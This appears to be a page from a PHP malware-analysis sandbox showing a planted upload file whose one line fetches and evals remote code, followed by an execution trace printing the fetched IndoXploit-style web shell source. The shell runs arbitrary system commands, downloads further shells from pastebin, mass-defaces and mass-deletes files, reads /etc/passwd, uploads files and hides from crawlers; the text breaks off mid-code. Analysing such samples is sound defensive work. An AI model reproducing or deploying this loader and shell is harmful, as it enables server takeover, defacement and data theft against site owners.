Jump to:
Screenshot
Attributes
Encoding
<?php
echo eval("?>" . file_get_contents("https://raw.githubusercontent.com/LanangAkira/OniChan/main/log.txt"));
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:49:30.560244]
1 0 1 0.000149 393608
1 3 0 0.000194 393648 {main} 1 /var/www/html/uploads/journals-BACKUP.php 0 0
2 4 0 0.000211 393648 file_get_contents 0 /var/www/html/uploads/journals-BACKUP.php 1 1 'https://raw.githubusercontent.com/LanangAkira/OniChan/main/log.txt'
2 4 1 0.054429 519560
2 4 R '<?php\nsession_start();\nerror_reporting(0);\nset_time_limit(0);\n@clearstatcache();\n@ini_set(\'error_log\',NULL);\n@ini_set(\'log_errors\',0);\n@ini_set(\'max_execution_time\',0);\n@ini_set(\'output_buffering\',0);\n@ini_set(\'display_errors\', 0);\n\n$password = "e460c73bf40f1437a34b8963bb572dee"; \n\n$SERVERIP = (!$_SERVER[\'SERVER_ADDR\']) ? gethostbyname($_SERVER[\'HTTP_HOST\']) : $_SERVER[\'SERVER_ADDR\'];\n$FILEPATH = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", path());\n\nif(!empty($_SERVER[\'HT'
2 5 0 0.057043 1079568 eval 1 '?><?php\nsession_start();\nerror_reporting(0);\nset_time_limit(0);\n@clearstatcache();\n@ini_set(\'error_log\',NULL);\n@ini_set(\'log_errors\',0);\n@ini_set(\'max_execution_time\',0);\n@ini_set(\'output_buffering\',0);\n@ini_set(\'display_errors\', 0);\n\n$password = "e460c73bf40f1437a34b8963bb572dee"; \n\n$SERVERIP = (!$_SERVER[\'SERVER_ADDR\']) ? gethostbyname($_SERVER[\'HTTP_HOST\']) : $_SERVER[\'SERVER_ADDR\'];\n$FILEPATH = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", path());\n\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot", "curl");\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n header(\'HTTP/1.0 404 Not Found\');\n exit;\n }\n}\n\nfunction login_shell() {\n?>\n<!DOCTYPE HTML>\n<html>\n<head>\n<meta name="robots" content="noindex. nofollow">\n<title>403 Forbidden</title>\n<style type="text/css">\nhtml {\n\tmargin: 20px auto;\n\tbackground: #000000;\n\tcolor: green;\n\ttext-align: center;\n}\nheader {\n\tcolor: green;\n\tmargin: 10px auto;\n}\ninput[type=password] {\n\twidth: 250px;\n\theight: 25px;\n\tcolor: red;\n\tbackground: transparent;\n\tborder: 1px dotted green;\n\tmargin-left: 20px;\n\ttext-align: center;\n}\n</style>\n</head>\n<center>\n<header>\n\t<pre>\n ___________________________\n< root@lanang404x:~# w00t??? >\n ---------------------------\n<img src="https://i.imgur.com/u4jDGJH.png" width="350px" align="center">\n\t</pre>\n</header>\n<form method="post">\n<input type="password" name="password">\n</form>\n<?php\nexit;\n}\n\nif(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]))\n if(empty($password) || (isset($_POST[\'password\']) && (md5($_POST[\'password\']) == $password)))\n $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\n else\n login_shell();\n\nif(isset($_GET[\'file\']) && ($_GET[\'file\'] != \'\') && ($_GET[\'act\'] == \'download\')) {\n @ob_clean();\n $file = $_GET[\'file\'];\n header(\'Content-Description: File Transfer\');\n header(\'Content-Type: application/octet-stream\');\n header(\'Content-Disposition: attachment; filename="\'.basename($file).\'"\');\n header(\'Expires: 0\');\n header(\'Cache-Control: must-revalidate\');\n header(\'Pragma: public\');\n header(\'Content-Length: \' . filesize($file));\n readfile($file);\n exit;\n}\n?>\n<html>\n<!--\n###############################################################################\n// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.\n// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.\n// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.\n// Tanpa kalian kita tidak akan BESAR seperti sekarang.\n// Greetz: All Member IndoXploit. & All My Friends.\n###############################################################################\n// Special Thanks: Depok Cyber Security | Sanjungan Jiwa | 0x1999\n###############################################################################\n-->\n<head>\n<title>403 Forbidden</title>\n<meta name=\'author\' content=\'L4N4N9_4K1R4\'>\n<meta charset="UTF-8">\n<style type=\'text/css\'>\n@import url(https://fonts.googleapis.com/css?family=Ubuntu);\nhtml {\n background: #000000;\n\tcolor: #ffffff;\n\tfont-size: 14px;\n\twidth: 100%;\n}\n\nli {\n\tdisplay: inline;\n\tmargin: 5px;\n\tpadding: 5px;\n}\n\na {\n\tcolor: #ffffff;\n\ttext-decoration: none;\n}\n\na:hover {\n\tcolor: gold;\n\ttext-decoration: underline;\n}\n\nb {\n\tcolor: gold;\n}\n\npre {\n\tfont-size: 13px;\n}\n\ntable, th, td {\n\tborder-collapse:collapse;\n\tbackground: transparent;\n\tfont-family: \'Ubuntu\';\n\tfont-size: 13px;\n}\n\n.table_home, .th_home, .td_home {\n\tborder: 1px solid #ffffff;\n}\n\n.th_home {\n\tcolor: aqua;\n}\n\n.td_home, .td_home > a {\n\tcolor: #ffffff;\n}\n\n.td_home > a:hover {\n\tcolor: gold;\n}\n\nth {\n\tpadding: 10px;\n}\n\ntr:hover {\n\tbackground: #00ada5;\n\tcolor: #ffffff;\n}\n\ninput[type=text], input[type=password], .input {\n\tbackground: transparent; \n\tcolor: #ffffff;\n\tborder: 1px solid #ffffff;\n\tpadding: 3px;\n\tfont-family: \'Ubuntu\';\n\tfont-size: 13px;\n}\n\ninput[type=submit] {\n\tpadding: 2px;}\n\ninput[type=submit]:hover {\n\tcursor: pointer;\n}\n\ninput:focus, textarea:focus {\n outline: 0;\n border-color: #ffffff;\n}\n\ntextarea {\n\tborder: 1px solid #ffffff;\n\twidth: 100%;\n\theight: 400px;\n\tpadding-left: 5px;\n\tmargin: 10px auto;\n\tresize: none;\n\tbackground: transparent;\n\tcolor: #ffffff;\n\tfont-family: \'Ubuntu\';\n\tfont-size: 13px;\n}\niframe {\n\twidth: 100%;\n\tmin-height: 500px;\n}\n</style>\n</head>\n<body>\n<div id="rotate"><img src="https://i.imgur.com/STpfZR9.png" width="300px" align="right"></div>\n<?php\nfunction path() {\n\tif(isset($_GET[\'dir\'])) {\n\t\t$dir = str_replace("\\\\", "/", $_GET[\'dir\']);\n\t\t@chdir($dir);\n\t} else {\n\t\t$dir = str_replace("\\\\", "/", getcwd());\n\t}\n\treturn $dir;\n}\n\nfunction color($bold = 1, $colorid = null, $string = null) {\n\t\t$color = array(\n\t\t\t"</font>", \t\t\t# 0 off\n\t\t\t"<font color=\'red\'>",\t# 1 red \n\t\t\t"<font color=\'aqua\'>",\t# 2 aqua\n\t\t\t"<font color=\'white\'>",\t# 3 white\n\t\t\t"<font color=\'gold\'>",\t# 4 gold\n\t\t);\n\n\treturn ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];\n}\n\nfunction OS() {\n\treturn (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux";\n}\n\nfunction exe($cmd) {\n\tif(function_exists(\'system\')) { \t\t\n\t\t@ob_start(); \t\t\n\t\t@system($cmd); \t\t\n\t\t$buff = @ob_get_contents(); \t\t\n\t\t@ob_end_clean(); \t\t\n\t\treturn $buff; \t\n\t} elseif(function_exists(\'exec\')) { \t\t\n\t\t@exec($cmd,$results); \t\t\n\t\t$buff = ""; \t\t\n\t\tforeach($results as $result) { \t\t\t\n\t\t\t$buff .= $result; \t\t\n\t\t} return $buff; \t\n\t} elseif(function_exists(\'passthru\')) { \t\t\n\t\t@ob_start(); \t\t\n\t\t@passthru($cmd); \t\t\n\t\t$buff = @ob_get_contents(); \t\t\n\t\t@ob_end_clean(); \t\t\n\t\treturn $buff; \t\n\t} elseif(function_exists(\'shell_exec\')) { \t\t\n\t\t$buff = @shell_exec($cmd); \t\t\n\t\treturn $buff; \t\n\t} \n}\n\nfunction save($filename, $mode, $file) {\n\t$handle = fopen($filename, $mode);\n\tfwrite($handle, $file);\n\tfclose($handle);\n\treturn;\n}\n\nfunction getfile($name) {\n\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t spawn $name."));\n\tif($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");\n\telseif($name === "webconsole") $get = array("https://pastebin.com/raw/2i96fDCN", "webconsole.php");\n\telseif($name === "cgitelnet1") $get = array("https://pastebin.com/raw/Lj46KxFT", "lanang_cgi/cgitelnet1.lanang");\n\telseif($name === "cgitelnet2") $get = array("https://pastebin.com/raw/aKL2QWfS", "lanang_cgi/cgitelnet2.lanang");\n\n\t$fp = fopen($get[1], "w");\n\t$ch = curl_init();\n\t \t curl_setopt($ch, CURLOPT_URL, $get[0]);\n\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\n\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\n\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\n\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\n\treturn curl_exec($ch);\n\t \t curl_close($ch);\n\tfclose($fp);\n\tob_flush();\n\tflush();\n}\n\nfunction usergroup() {\n\tif(!function_exists(\'posix_getegid\')) {\n\t\t$user[\'name\'] \t= @get_current_user();\n\t\t$user[\'uid\'] \t= @getmyuid();\n\t\t$user[\'gid\'] \t= @getmygid();\n\t\t$user[\'group\']\t= "?";\n\t} else {\n\t\t$user[\'uid\'] \t= @posix_getpwuid(posix_geteuid());\n\t\t$user[\'gid\'] \t= @posix_getgrgid(posix_getegid());\n\t\t$user[\'name\'] \t= $user[\'uid\'][\'name\'];\n\t\t$user[\'uid\'] \t= $user[\'uid\'][\'uid\'];\n\t\t$user[\'group\'] \t= $user[\'gid\'][\'name\'];\n\t\t$user[\'gid\'] \t= $user[\'gid\'][\'gid\'];\n\t}\n\treturn (object) $user;\n}\n\nfunction getuser() {\n\t$fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can\'t read /etc/passwd"));\n\twhile($read = fgets($fopen)) {\n\t\tpreg_match_all(\'/(.*?):x:/\', $read, $getuser);\n\t\t$user[] = $getuser[1][0];\n\t}\n\treturn $user;\n}\n\nfunction getdomainname() {\n\t$fopen = fopen("/etc/named.conf", "r");\n\twhile($read = fgets($fopen)) {\n\t\tpreg_match_all("#/var/named/(.*?).db#", $read, $getdomain);\n\t\t$domain[] = $getdomain[1][0];\n\t}\n\treturn $domain;\n}\n\nfunction hddsize($size) {\n\tif($size >= 1073741824)\n\t\treturn sprintf(\'%1.2f\',$size / 1073741824 ).\' GB\';\n\telseif($size >= 1048576)\n\t\treturn sprintf(\'%1.2f\',$size / 1048576 ) .\' MB\';\n\telseif($size >= 1024)\n\t\treturn sprintf(\'%1.2f\',$size / 1024 ) .\' KB\';\n\telse\n\t\treturn $size .\' B\';\n}\n\nfunction hdd() {\n\t$hdd[\'size\'] = hddsize(disk_total_space("/"));\n\t$hdd[\'free\'] = hddsize(disk_free_space("/"));\n\t$hdd[\'used\'] = $hdd[\'size\'] - $hdd[\'free\'];\n\treturn (object) $hdd;\n}\n\nfunction writeable($path, $perms) {\n\treturn (!is_writable($path)) ? color(1, 1, $perms) : color(1, 2, $perms);\n}\n\nfunction perms($path) {\n\t$perms = fileperms($path);\n\tif (($perms & 0xC000) == 0xC000) {\n\t\t// Socket\n\t\t$info = \'s\';\n\t} \n\telseif (($perms & 0xA000) == 0xA000) {\n\t\t// Symbolic Link\n\t\t$info = \'l\';\n\t} \n\telseif (($perms & 0x8000) == 0x8000) {\n\t\t// Regular\n\t\t$info = \'-\';\n\t} \n\telseif (($perms & 0x6000) == 0x6000) {\n\t\t// Block special\n\t\t$info = \'b\';\n\t} \n\telseif (($perms & 0x4000) == 0x4000) {\n\t\t// Directory\n\t\t$info = \'d\';\n\t} \n\telseif (($perms & 0x2000) == 0x2000) {\n\t\t// Character special\n\t\t$info = \'c\';\n\t} \n\telseif (($perms & 0x1000) == 0x1000) {\n\t\t// FIFO pipe\n\t\t$info = \'p\';\n\t} \n\telse {\n\t\t// Unknown\n\t\t$info = \'u\';\n\t}\n\t\t// Owner\n\t$info .= (($perms & 0x0100) ? \'r\' : \'-\');\n\t$info .= (($perms & 0x0080) ? \'w\' : \'-\');\n\t$info .= (($perms & 0x0040) ?\n\t(($perms & 0x0800) ? \'s\' : \'x\' ) :\n\t(($perms & 0x0800) ? \'S\' : \'-\'));\n\t// Group\n\t$info .= (($perms & 0x0020) ? \'r\' : \'-\');\n\t$info .= (($perms & 0x0010) ? \'w\' : \'-\');\n\t$info .= (($perms & 0x0008) ?\n\t(($perms & 0x0400) ? \'s\' : \'x\' ) :\n\t(($perms & 0x0400) ? \'S\' : \'-\'));\n\t// World\n\t$info .= (($perms & 0x0004) ? \'r\' : \'-\');\n\t$info .= (($perms & 0x0002) ? \'w\' : \'-\');\n\t$info .= (($perms & 0x0001) ?\n\t(($perms & 0x0200) ? \'t\' : \'x\' ) :\n\t(($perms & 0x0200) ? \'T\' : \'-\'));\n\n\treturn $info;\n}\n\nfunction lib_installed() {\n\t$lib[] = "MySQL: ".(function_exists(\'mysql_connect\') ? color(1, 2, "ON") : color(1, 1, "OFF"));\n\t$lib[] = "cURL: ".(function_exists(\'curl_version\') ? color(1, 2, "ON") : color(1, 1, "OFF"));\n\t$lib[] = "WGET: ".(exe(\'wget --help\') ? color(1, 2, "ON") : color(1, 1, "OFF"));\n\t$lib[] = "Perl: ".(exe(\'perl --help\') ? color(1, 2, "ON") : color(1, 1, "OFF"));\n\t$lib[] = "Python: ".(exe(\'python --help\') ? color(1, 2, "ON") : color(1, 1, "OFF"));\n\treturn implode(" | ", $lib);\n}\n\nfunction pwd() {\n\t$dir = explode("/", path());\n\tforeach($dir as $key => $index) {\n\t\tprint "<a href=\'?dir=";\n\t\tfor($i = 0; $i <= $key; $i++) {\n\t\t\tprint $dir[$i];\n\t\t\tif($i != $key) {\n\t\t\tprint "/";\n\t\t\t}\n\t\t}\n\t\tprint "\'>$index</a>/";\n\t}\n\tprint "<br>";\n\tprint (OS() === "Windows") ? windisk() : "";\n}\n\nfunction windisk() {\n\t$letters = "";\n\t$v = explode("\\\\", path());\n\t$v = $v[0];\n\t foreach(range("A", "Z") as $letter) {\n\t \t$bool = $isdiskette = in_array($letter, array("A"));\n\t \tif(!$bool) $bool = is_dir("$letter:\\\\");\n\t \tif($bool) {\n\t \t\t$letters .= "[ <a href=\'?dir=$letter:\\\\\'".($isdiskette?" onclick=\\"return confirm(\'Make sure that the diskette is inserted properly, otherwise an error may occur.\')\\"":"").">";\n\t \t\tif($letter.":" != $v) {\n\t \t\t\t$letters .= $letter;\n\t \t\t}\n\t \t\telse {\n\t \t\t\t$letters .= color(1, 2, $letter);\n\t \t\t}\n\t \t\t$letters .= "</a> ]";\n\t \t}\n\t}\n\tif(!empty($letters)) {\n\t\tprint "Detected Drives $letters<br>";\n\t}\n\tif(count($quicklaunch) > 0) {\n\t\tforeach($quicklaunch as $item) {\n\t \t\t$v = realpath(path(). "..");\n\t \t\tif(empty($v)) {\n\t \t\t\t$a = explode(DIRECTORY_SEPARATOR,path());\n\t \t\t\tunset($a[count($a)-2]);\n\t \t\t\t$v = join(DIRECTORY_SEPARATOR, $a);\n\t \t\t}\n\t \t\tprint "<a href=\'".$item[1]."\'>".$item[0]."</a>";\n\t\t}\n\t}\n}\n\nfunction serverinfo() {\n\t$disable_functions = @ini_get(\'disable_functions\');\n\t$disable_functions = (!empty($disable_functions)) ? color(1, 1, $disable_functions) : color(1, 2, "NONE");\n\n\t$output[] = "SERVER IP ".color(1, 2, $GLOBALS[\'SERVERIP\'])." / YOUR IP ".color(1, 2, $_SERVER[\'REMOTE_ADDR\']);\n\t$output[] = "WEB SERVER : ".color(1, 2, $_SERVER[\'SERVER_SOFTWARE\']);\n\t$output[] = "SYSTEM : ".color(1, 2, php_uname());\n\t$output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";\n\t$output[] = "HDD : ".color(1, 2, hdd()->used)." / ".color(1, 2 , hdd()->size)." (Free: ".color(1, 2 , hdd()->free).")";\n\t$output[] = "PHP VERSION : ".color(1, 2, @phpversion());\n\t$output[] = "SAFE MODE : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));\n\t$output[] = "DISABLE FUNC: $disable_functions";\n\t$output[] = lib_installed();\n\t$output[] = "Current Dir (".writeable(path(), perms(path())).") ";\n\n\tprint "<pre>";\n\tprint implode("<br>", $output);\n\tpwd();\n\tprint "</pre>";\n\n}\n\nfunction curl($url, $post = false, $data = null) {\n $ch = curl_init($url);\n \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n \t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\n \t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\n \t curl_setopt($ch, CURLOPT_TIMEOUT, 10);\n \t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);\n if($post) {\n \t curl_setopt($ch, CURLOPT_POST, true);\n \t curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n }\n $curl[\'exec\'] = curl_exec($ch);\n\t$curl[\'info\'] = curl_getinfo($ch);\n\n\treturn [\n\t\t"info" \t\t=> $curl[\'info\'],\n\t\t"response" \t=> $curl[\'exec\']\n\t];\n\n\t\t curl_close($ch);\n}\n\nfunction reverse() {\n\t$response = curl("http://domains.yougetsignal.com/domains.php", TRUE, "remoteAddress=".$GLOBALS[\'SERVERIP\']."&ket=")[\'response\'];\n\t$response = str_replace("[","", str_replace("]","", str_replace("\\"\\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("\'","", str_replace("\'","", str_replace(":",",", str_replace(\'"\',\'\', $response)))))))))))));\n\t$explode = explode(",,", $response);\n\tunset($explode[0]);\n\n\tforeach($explode as $domain) {\n\t\t$domain = "http://$domain";\n\t\t$domain = str_replace(",", "", $domain);\n\t\t$url[] \t= $domain;\n\t\tob_flush();\n\t\tflush();\n\t}\n\n\treturn $url;\n}\n\nfunction getValue($param, $kata1, $kata2){\n if(strpos($param, $kata1) === FALSE) return FALSE;\n if(strpos($param, $kata2) === FALSE) return FALSE;\n $start \t= strpos($param, $kata1) + strlen($kata1);\n $end \t= strpos($param, $kata2, $start);\n $return = substr($param, $start, $end - $start);\n return $return;\n}\n\nfunction massdeface($dir, $file, $filename, $type = null) {\n\t$scandir = scandir($dir);\n\tforeach($scandir as $dir_) {\n\t\t$path = "$dir/$dir_";\n\t\t$location = "$path/$filename";\n\t\tif($dir_ === "." || $dir_ === "..") {\n\t\t\tfile_put_contents($location, $file);\n\t\t}\n\t\telse {\n\t\t\tif(is_dir($path) AND is_writable($path)) {\n\t\t\t\tprint "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."<br>";\n\t\t\t\tfile_put_contents($location, $file);\n\t\t\t\tif($type === "-alldir") {\n\t\t\t\t\tmassdeface($path, $file, $filename, "-alldir");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunction massdelete($dir, $filename) {\n\t$scandir = scandir($dir);\n\tforeach($scandir as $dir_) {\n\t\t$path = "$dir/$dir_";\n\t\t$location = "$path/$filename";\n\t\tif($dir_ === \'.\') {\n\t\t\tif(file_exists("$dir/$filename")) {\n\t\t\t\tunlink("$dir/$filename");\n\t\t\t}\n\t\t} \n\t\telseif($dir_ === \'..\') {\n\t\t\tif(file_exists(dirname($dir)."/$filename")) {\n\t\t\t\tunlink(dirname($dir)."/$filename");\n\t\t\t}\n\t\t} \n\t\telse {\n\t\t\tif(is_dir($path) AND is_writable($path)) {\n\t\t\t\tif(file_exists($location)) {\n\t\t\t\t\tprint "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."<br>";\n\t\t\t\t\tunlink($location);\n\t\t\t\t\tmassdelete($path, $filename);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunction tools($toolsname, $args = null) {\n\tif($toolsname === "cmd") {\n\t\tprint "<form method=\'post\' action=\'?do=cmd&dir=".path()."\' style=\'margin-top: 15px;\'>\n\t\t\t ".usergroup()->name."@".$GLOBALS[\'SERVERIP\'].": ~ $\n\t\t\t <input style=\'border: none; border-bottom: 1px solid #ffffff;\' type=\'text\' name=\'cmd\' required>\n\t\t\t <input style=\'border: none; border-bottom: 1px solid #ffffff;\' class=\'input\' type=\'submit\' value=\'>>\'>\n\t\t\t </form>";\n\t}\n\telseif($toolsname === "readfile") {\n\t\tif(empty($args)) die(color(1, 1, $msg));\n\t\tif(!is_file($args)) die(color(1, 1, "File \'$args\' is not exists."));\n\n\t\tprint "<pre>";\n\t\tprint htmlspecialchars(file_get_contents($args));\n\t\tprint "</pre>";\n\t}\n\telseif($toolsname === "spawn") {\n\t\tif($args === "adminer") {\n\t\t\tif(file_exists("adminer.php")) {\n\t\t\t\tprint "Login Adminer: <a href=\'".$GLOBALS[\'FILEPATH\']."/adminer.php\' target=\'_blank\'>http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/adminer.php</a>";\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create file \'Adminer\'."));\n\t\t\t\tif(getfile("adminer")) {\n\t\t\t\t\tprint "Login Adminer: <a href=\'".$GLOBALS[\'FILEPATH\']."/adminer.php\' target=\'_blank\'>http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/adminer.php</a>";\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tprint color(1, 1, "Error while downloading file Adminer.");\n\t\t\t\t\t@unlink("adminer.php");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telseif($args === "webconsole") {\n\t\t\tif(file_exists("webconsole.php")) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/webconsole.php\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create file \'WebConsole\'."));\n\t\t\t\tif(getfile("webconsole")) {\n\t\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/webconsole.php\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tprint color(1, 1, "Error while downloading file WebConsole.");\n\t\t\t\t\t@unlink("webconsole.php");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telseif($args === "cgitelnet1") {\n\t\t\tif(file_exists("lanang_cgi/cgitelnet1.lanang")) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_cgi/cgitelnet1.lanang\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t\telseif(file_exists(\'cgitelnet1.lanang\')) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/cgitelnet1.lanang\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create directory \'lanang_cgi\'."));\n\t\t\t\tif(!is_dir(path()."/lanang_cgi/")) {\n\t\t\t\t\t@mkdir(\'lanang_cgi\', 0755);\n\t\t\t\t\tsave("lanang_cgi/.htaccess", "w", "AddHandler cgi-script .lanang");\n\t\t\t\t}\n\t\t\t\tif(getfile("cgitelnet1")) {\n\t\t\t\t\tchmod(\'lanang_cgi/cgitelnet1.lanang\', 0755);\n\t\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_cgi/cgitelnet1.lanang\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tprint color(1, 1, "Error while downloading file CGI Telnet.");\n\t\t\t\t\t@rmdir(path()."/lanang_cgi/");\n\t\t\t\t\tif(!@rmdir(path()."/lanang_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/lanang_cgi/");\n\t\t\t\t\tif(!@rmdir(path()."/lanang_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/lanang_cgi/");\n\t\t\t\t}\n\t\t\t}\n\t\n\t\t}\n\t\telseif($args === "cgitelnet2") {\n\t\t\tif(file_exists("lanang_cgi/cgitelnet2.lanang")) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_cgi/cgitelnet2.lanang\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t\telseif(file_exists(\'cgitelnet2.lanang\')) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/cgitelnet2.lanang\' frameborder=\'0\' scrolling=\'no\'></iframe>";\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create directory \'lanang_cgi\'."));\n\t\t\t\tif(!is_dir(path()."/lanang_cgi/")) {\n\t\t\t\t\t@mkdir(\'lanang_cgi\', 0755);\n\t\t\t\t\tsave("lanang_cgi/.htaccess", "w", "AddHandler cgi-script .lanang");\n\t\t\t\t}\n\t\t\t\tif(getfile("cgitelnet2")) {\n\t\t\t\t\tchmod(\'lanang_cgi/cgitelnet2.lanang\', 0755);\n\t\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/lanang_cgi/cgitelnet2.lanang\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tprint color(1, 1, "Error while downloading file CGI Telnet.");\n\t\t\t\t\t@rmdir(path()."/lanang_cgi/");\n\t\t\t\t\tif(!@rmdir(path()."/lanang_cgi/") AND OS() === "Linux") @exe("rm -rf ".path()."/lanang_cgi/");\n\t\t\t\t\tif(!@rmdir(path()."/lanang_cgi/") AND OS() === "Windows") @exe("rmdir /s /q ".path()."/lanang_cgi/");\n\t\t\t\t}\n\t\t\t}\n\t\n\t\t}\n\t\telseif($args === "phpinfo") {\n\t\t\tif(file_exists(\'phpinfo.php\') AND preg_match("/phpinfo()/", file_get_contents(\'phpinfo.php\'))) {\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/phpinfo.php\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t\telse {\n\t\t\t\tif(!is_writable(path())) die(color(1, 1, "Directory \'".path()."\' is not writeable. Can\'t create file \'phpinfo\'."));\n\t\t\t\tsave("phpinfo.php", "w", "<?php print \'<html><style>html,body {background: #000000;}</style><div style=\\\'background: #000000; color: #cccccc;\\\'>\'; phpinfo(); print \'</div></html>\'; ?>");\n\t\t\t\tprint "<iframe src=\'http://".$_SERVER[\'HTTP_HOST\']."/".$GLOBALS[\'FILEPATH\']."/phpinfo.php\' frameborder=\'0\' scrolling=\'yes\'></iframe>";\n\t\t\t}\n\t\t}\n\t}\n\telseif($toolsname === "upload") {\n\t\tif($_POST[\'upload\']) {\n\t\t\tif($_POST[\'uploadtype\'] === \'1\') {\n\t\t\t\tif(@copy($_FILES[\'file\'][\'tmp_name\'], path().DIRECTORY_SEPARATOR.$_FILES[\'file\'][\'name\']."")) {\n\t\t\t\t\t$act = color(1, 2, "Uploaded!")." at <i><b>".path().DIRECTORY_SEPARATOR.$_FILES[\'file\'][\'name\']."</b></i>";\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Failed to upload file!");\n\t\t\t\t}\n\t\t\t} \n\t\t\telseif($_POST[\'uploadtype\'] === \'2\') {\n\t\t\t\t$root = $_SERVER[\'DOCUMENT_ROOT\'].DIRECTORY_SEPARATOR.$_FILES[\'file\'][\'name\'];\n\t\t\t\t$web = $_SERVER[\'HTTP_HOST\'].DIRECTORY_SEPARATOR.$_FILES[\'file\'][\'name\'];\n\t\t\t\tif(is_writable($_SERVER[\'DOCUMENT_ROOT\'])) {\n\t\t\t\t\tif(@copy($_FILES[\'file\'][\'tmp_name\'], $root)) {\n\t\t\t\t\t\t$act = color(1, 2, "Uploaded!")." at <i><b>$root -> </b></i><a href=\'http://$web\' target=\'_blank\'>$web</a>";\n\t\t\t\t\t} \n\t\t\t\t\telse {\n\t\t\t\t\t\t$act = color(1, 1, "Failed to upload file!");\n\t\t\t\t\t}\n\t\t\t\t} \n\t\t\t\telse {\n\t\t\t\t\t$act = color(1, 1, "Failed to upload file!");\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tprint "Upload File: 